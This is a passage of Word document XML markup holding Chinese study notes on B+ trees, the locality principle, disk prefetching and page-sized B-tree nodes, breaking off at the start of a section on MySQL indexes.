          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762500" cy="2582545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="7" name="图片 7" descr="http://my.csdn.net/uploads/201207/28/1343448307_67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my.csdn.net/uploads/201207/28/1343448307_6771.jpg"/>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4762500" cy="2582545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="000F5F96">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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通常在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树上有两个头指针，一个指向根节点，另一个指向关键字最小的叶子节点。因此可以对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树进行两种查找运算：一种是从最小关键字起顺序查找，另一种是从根节点开始，进行随机查找。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="000F5F96">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树上进行随机查找、插入和删除的过程基本上与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树类似。只是在查找时，若非终端结点上的关键码等于给定值，并不终止，而是继续向下直到叶子结点。因此，在</w:t>
      </w:r>
      <w:r w:rsidR="000067D5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树，不管查找成功与否，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每次查找都是走了一条从根到叶子结点的路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895BB3" w:rsidRPr="00F41A4C" w:rsidRDefault="00895BB3" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D70D1A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D70D1A" w:rsidP="00D70D1A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>局部性原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627EA6" w:rsidRPr="00F41A4C" w:rsidRDefault="00FD3322" w:rsidP="00627EA6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了将大型数据库文件存储在硬盘上</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以减少访问硬盘次数为目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在此提出了一种平衡多路查找树</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>——B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>由其性能分析可知它的检索效率是相当高的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了提高</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>能</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还有很多种</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的变型，力图对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树进行改进</w:t>
      </w:r>
      <w:r w:rsidR="00F72CE3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3282" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE2229" w:rsidP="00BD3282">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于存储介质的特性，磁盘本身存取就比主存慢很多，再加上机械运动耗费，磁盘的存取速度往往是主存的几百分分之一，因此为了提高效率，要尽量减少磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。为了达到这个目的，磁盘往往不是严格按需读取，而是每次都会预读，即使只需要一个字节，磁盘也会从这个位置开始，顺序向后读取一定长度的数据放入内存。这样做的理论依据是计算机科学中著名的局部性原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3282" w:rsidRPr="00F20C63" w:rsidRDefault="00CE2229" w:rsidP="00BD3282">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20C63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当一个数据被用到时，其附近的数据也通常会马上被使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3282" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE2229" w:rsidP="00BD3282">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序运行期间所需要的数据通常比较集中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3282" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE2229" w:rsidP="00BD3282">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于磁盘顺序读取的效率很高（不需要寻道时间，只需很少的旋转时间），因此对于具有局部性的程序来说，预读可以提高</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2229" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE2229" w:rsidP="00BF0C3C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9244E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>预读的长度一般为页（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9244E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9244E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）的整倍数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。页是计算机管理存储器的逻辑块，硬件及操作系统往往将主存和磁盘存储区分割为连续的大小相等的块，每个存储块称为一页（在许多操作系统中，页得大小通常为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），主存和磁盘以页为单位交换数据。当程序要读取的数据不在主存中时，会触发一个缺页异常，此时系统会向磁盘发出读盘信号，磁盘会找到数据的起始位置并向后连续读取一页或几页载入内存中，然后异常返回，程序继续运行</w:t>
      </w:r>
      <w:r w:rsidR="00BF0C3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044617F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB714B" w:rsidP="00BA0B84">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>树一个节点大于等于一个</w:t>
      </w:r>
      <w:r w:rsidR="00EE4182" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>页的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，减少磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044617F" w:rsidRPr="00F41A4C" w:rsidRDefault="0044617F" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00442CA9" w:rsidRPr="00F41A4C" w:rsidRDefault="00943AD8" w:rsidP="00442CA9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00442CA9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00442CA9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442CA9" w:rsidRPr="00F41A4C" w:rsidRDefault="00943AD8" w:rsidP="008A489C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="004D7425" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1 mysql</w:t>
      </w:r>
      <w:r w:rsidR="004D7425" w:rsidRPr="00F41A4C">
